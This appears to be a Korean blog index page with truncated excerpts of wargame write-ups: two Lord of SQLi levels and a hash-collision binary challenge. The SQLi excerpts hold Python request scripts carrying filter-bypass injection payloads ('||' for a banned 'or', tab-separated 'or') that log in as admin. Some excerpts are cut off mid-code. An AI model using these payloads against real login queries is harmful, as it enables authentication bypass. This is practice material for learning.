LOS 6번 darkelf입니다.소스코드를 확인하면 다음과 같습니다. 이전거와 달라진점을 찾는다면 or이 ban먹었습니다.전에 알려준 두번째 방법처럼 or -> ||으로 바꾸면 필터링을 넘어가게 됩니다! 페이로드입니다 :) 1234567891011121314import requestsimport string URL = "http://los.eagle-jump.org/darkelf_6e50323a0bfccc2f3daf4df731651f75.php"payload = "?pw=1'||id='admin'%23"URL += payload cookies = dict(PHPSESSID="dvs710ccqajrn9434hc3a00r11")response = requests.get(URL, cookies = cookie..

이번은 LOS 5번 wolfman입니다. 소스코드를 확인하면 id를 admin으로 만들어주면 풀 수 있게 됩니다. 페이로드는 다음과 같습니다. 12345678910111213import requestsimport string URL = "http://los.eagle-jump.org/wolfman_f14e72f8d97e3cb7b8fe02bef1590757.php"payload = "?pw=1'or%09id='admin'%23" # "?pw=1'||id='admin'%23" 0: for i in range(1, 10) : print("WOOOOOOOOOOOOOOOOOOOOOOWsolveIT!!")cs

먼저 코드부터 확인해보면 다음과 같습니다. 프로그램상 실행하면서 인자값으로 데이터를 전달받기때문에 값은 인자로 넘겨주면될 것 같습니다. 조건1 : 인자1개이상 넣어주기조건2 : 길이 20byte로 맞추기조건3 : hashcode와 함수를 통과한 넣어준 값일치하게하기 함수를 보면 인자로 받은 값을을 4byte씩 끊는 것을 볼 수 있습니다. 이렇게 총 5번을 나눠서ㅁㅁㅁㅁ/ㅁㅁㅁㅁ/ㅁㅁㅁㅁ/ㅁㅁㅁㅁ/ㅁㅁㅁㅁ이렇게 만들고 이거를 배열로 가정하였을때[0] + [1] + [2] + [3] + [4] = hashcode가 되어야합니다. 그럼 hashcode를 5로 나누면 될 것 같습니다.이대로 exploirt코드 작성해서 익스해주면?? 왜 안되지...라고 생각했는데 프로그래머계산기는 나머지를 버릴수밖에 없어서 21..